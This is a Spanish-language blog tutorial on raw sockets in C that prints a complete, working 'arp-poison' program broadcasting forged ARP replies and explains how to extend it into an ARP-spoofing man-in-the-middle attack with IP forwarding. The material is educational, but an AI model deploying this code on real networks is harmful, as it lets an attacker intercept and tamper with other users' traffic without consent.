Thursday, September 7, 2017
En crudo y sin censura RAW SOCKETS II en C
En crudo y sin censura RAW SOCKETS II en C

Bueno como promet� en la entrada anterior vamos a ver el ejemplo que os dej�, vamos a ver las partes importantes de Sockets Raw, y a�adiremos o modificaremos el c�digo para conseguir un ejemplo m�s vers�til...
Al lector: si incurro en cualquier error a lo largo de estos post agradecer�a vuestras correcciones.
Como primer ejercicio quiero que le ech�is un vistazo m�s a fondo al c�digo que est� debajo de este p�rrafo, y le�is los comentarios donde a grandes rasgos explico el funcionamiento del ejemplo que os dej� la semana pasada, si no entend�is nada (nadie dijo que programar para sockets fuera a ser f�cil), no agobiarse, basta con echarle un ojo para que cuando explique la teor�a os suene por donde cae en el c�digo:
#include <stdio.h>//libreria estandar
#include <stdlib.h>//libreria estandar
#include <unistd.h>// close(sock)
#include <string.h>//biblioteca standar
#include <netinet/if_ether.h> //estructuras ethernet arp headers
#include <net/if.h>// sockets interfaces locales
#include <sys/socket.h> // encabezado de sockets principales
#include <arpa/inet.h>//definiciones de las operaciones de Internet
#include <netpacket/packet.h>// struct sockaddr_ll
#include <net/ethernet.h>//id protos ethernet
#include <signal.h> //signal(SIGINT, cleanup);
#define IP4LEN 4 //define la
#define PKTLEN sizeof(struct ether_header) + sizeof(struct ether_arp)
int sock;
void usage() { //funcion para mostrar el help del programa por pantalla
puts("usage: ./arp-poison <interface> <gateway ip> <mac addr>");
puts("ex: ./arp-poison eth0 10.1.1.1 aa:bb:cc:dd:ee:ff");
exit(1);
}
void cleanup() { //utilizaremos esta funcion para cerrar el socket
close(sock); //mediante la funcion close() de <unistd.h>
exit(0); //la funcion no retornara valor alguno
}
main(int argc, char ** argv) {
char packet[PKTLEN]; //definimos la longitud del paquete a la suma del la cabecera ETHERNET+ARP
struct ether_header * eth = (struct ether_header *) packet; //declaramos la variable eth y la apuntamos
//a struct ether_headder del paquete (<netinet/if_ether.h>)
struct ether_arp * arp = (struct ether_arp *) (packet + sizeof (struct ether_header)); //igual que el anteriot pero
//ether_arp para poder meter
//mas tarde valores.
struct sockaddr_ll device; //<netpacket/packet.h> hacemos que int sll_ifindex;apunte a nuestra variable device
if (argc < 4) {//si los argumento pasados para lanzar el programa
usage();
}//son inferiores a 4 lanzamos la funcion usage()mostrando asi la ayuda
sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP)); //declaramos el socket con su familia,
//tipo raw,protocolo. htons()convierte el entero corto sin signo hostshort desde el orden de bytes del host al de la red.
if (sock < 0) //si no se crea el shocket llamamos a exit()
perror("socket"), exit(1);
signal(SIGINT, cleanup);
//RELLENAMOS LAS ESTRUCTURAS
//recogemos la mac del argumento 3 (hexadecimal)
//y se l pasamos a la structura ARP concretamente arp_sha[ETH_ALEN];/* sender hardware address */
// de la libreria <netinet/if_ether.h> sin signo
sscanf(argv[3], "%x:%x:%x:%x:%x:%x", (unsigned int *) &arp->arp_sha[0],
(unsigned int *) &arp->arp_sha[1],
(unsigned int *) &arp->arp_sha[2],
(unsigned int *) &arp->arp_sha[3],
(unsigned int *) &arp->arp_sha[4],
(unsigned int *) &arp->arp_sha[5]);
//recogemos la ip pasada en el argumento 2 (decimal) a arp_spa <netinet/if_ether.h> entero
sscanf(argv[2], "%d.%d.%d.%d",(int *) &arp->arp_spa[0],
(int *) &arp->arp_spa[1],
(int *) &arp->arp_spa[2],
(int *) &arp->arp_spa[3]);
///////
memset(eth->ether_dhost, 0xff, ETH_ALEN);//bcast destination eth address */>/a la structura ethernet
memcpy(eth->ether_shost, arp->arp_sha, ETH_ALEN);//* "source ether addr" a structura etherne y a" hardware address" struc_arp
eth->ether_type = htons(ETH_P_ARP);
//pasamos el al heather ethernet el valor ETH_P_ARR
//de if_ether.h " ETH_P_ARP 0x080 Address Resolution packet */"
arp->ea_hdr.ar_hrd = htons(ARPHRD_ETHER);
arp->ea_hdr.ar_pro = htons(ETH_P_IP);
arp->ea_hdr.ar_hln = ETH_ALEN;
arp->ea_hdr.ar_pln = IP4LEN;
arp->ea_hdr.ar_op = htons(ARPOP_REPLY);
memset(arp->arp_tha, 0xff, ETH_ALEN);
memset(arp->arp_tpa, 0x00, IP4LEN);
memset(&device, 0, sizeof(device));
device.sll_ifindex = if_nametoindex(argv[1]);
device.sll_family = AF_PACKET;
memcpy(device.sll_addr, arp->arp_sha, ETH_ALEN);
device.sll_halen = htons(ETH_ALEN);
puts("press ctrl+c to exit.");
while (1) {
printf("%s: %s is at %s ", argv[1], argv[2], argv[3]);
sendto(sock, packet, PKTLEN, 0, (struct sockaddr *) &device, sizeof(device));//mandamos los paquetes
sleep(2);
}
return 0;
}
Se que promet� no ponerme en rollo t�cnico, pero para empezar con sockets al menos nos deben sonar un par de conceptos cr�ticos... intentar� ser lo mas simple y conciso que pueda...
Encapsulaci�n de datos:
"En redes de ordenadores, encapsulaci�n es un m�todo de dise�o modular de protocolos de comunicaci�n en el cual las funciones l�gicas de una red son abstra�das ocultando informaci�n a las capas de nivel superior".


Un buen s�mil de esto es mandar una carta a un amigo que vive en otro continente; escribes la carta, luego va a el cartero, despu�s al cami�n, que la lleva al avi�n...
Cuando llegue tu carta para que la coja tu amigo debe salir del avi�n, ir a otro cami�n y cogerla otro cartero que se la entregar� a tu amigo.
En el proceso de viaje del paquete por las distintas capas del modelo TCP, los encargados de transportarlas son los protocolos y estos necesitan de unas cabeceras donde se le indique que transportan y donde lo transportan (entre otros datos).
En el caso de SOCK_DGRAM y SOCK_STREAM este trabajo lo lleva a cabo el Kernel, pero amigos, en el caso que nos ocupa SOCK_RAW y como vimos en la entrada anterior "Los campos del Header los deberemos rellenar manualmente, al contrario que si trabaj�semos con otro tipo de socket; el kernel no rellena las cabeceras".
Para hacer esto c�modamente utilizaremos las Estructuras.
�QU� SON LAS ESTRUCTURAS?
Resumi�ndolo un poco: "Las estructuras son colecciones de variables relacionadas bajo un nombre. Las estructuras pueden contener variables de muchos tipos diferentes de datos a diferencia de los arreglos que contienen �nicamente elementos de un mismo tipo de datos".
Para ver esto mucho mas claro vamos a recurrir a nuestro ejemplo examinando un fragmento donde rellenamos las estructura ya programada que utilizamos de las librer�as incluidas en el c�digo:
En nuestro ejemplo, vamos a mandar una trama ARP por la capa de enlace,
el encargado de esto es el protocolo ETHERNET. Para conseguir esto necesitamos la estructura de los Headers ethernet, y la estructura del paquete arp.



Le decimos el tipo de paquete que va a ser ADDRESS RESOLUTION PACKET.
que lo hemos sacado de if_ether.h convirti�ndolo con htons (la funci�n htons convierte a u_short del host en orden de bytes de red TCP / IP si fuese necesario):


A la Estructura ether_arp alojada en <if_ether.h>

Espero que no os est� liando mucho... solo ten�is que quedaros con que las estructuras son una colecci�n de datos, que podemos encontrarlas en las librer�as ya preconcebidas para crear paquetes <netinet.h> y c�mo sacar y meter datos en ellas. ya veremos esto m�s despacio.
�Menuda chapa! vamos a asimilarla con la pr�ctica.
Vamos a dejar por el momento las comederas de cabeza hasta la tercera entrada, y vamos con lo divertido.
Construyendo nuestra primer herramienta
Dije que convertir�amos el c�digo del ejemplo en algo m�s funcional y divertido, vamos hacer una herramienta que nos permita hacer un Man In The Middle.
Si estas leyendo esta entrada supongo que sabras que es un MITM y en que consiste un ataque de falsificaci�n ARP o ARP Spoofing, pero vamos a recordarlo a grandes rasgos.
El principio del ARP Spoofing es enviar mensajes ARP falsos (falsificados o spoofed) a la Ethernet. Normalmente la finalidad es asociar la direcci�n MAC del atacante con la direcci�n IP de otro nodo (el nodo atacado), como por ejemplo la puerta de enlace predeterminada (gateway).
Esta t�cnica de arp spoofing, si se hace de manera bidireccional obtenemos el resultado de un ataque man in the middle.
Es decir el atacante le dice ala red (todos los equipos) o a la v�ctima (ataque dirigido) que es el gateway . El medio del ataque es el envenenamiento de las tablas ARP de los equipos.
Vamos a establecer el escenario:
Supongamos que se da la siguiente situaci�n:

�C�mo conseguimos esto?: mediante paquetes ARP-Reply, en primer lugar a la v�ctima le decimos que somos el router mand�ndole un ARP-reply y diciendo que a nuestra mac le corresponde la ip del router.

El siguiente paso ser� mandar un paquete ARP-reply al router dici�ndole que somos la v�ctima, el protocolo ARP modificar� la tabla Arp del router como hizo con la victima. Podremos interceptar la informaci�n bi-direccionalmente, siempre de manera transparente para la victima siempre y cuando tengamos activado el IP forward en nuestro equipo (echo 1 > /proc/sys/net/ipv4/ip_forward).
Y �c�mo podemos manipular los paquetes ARP? pues chatos: con SOCK_RAW!
Pero esto ser� en la siguiente entrada..
Un saludo
Manuel
download file now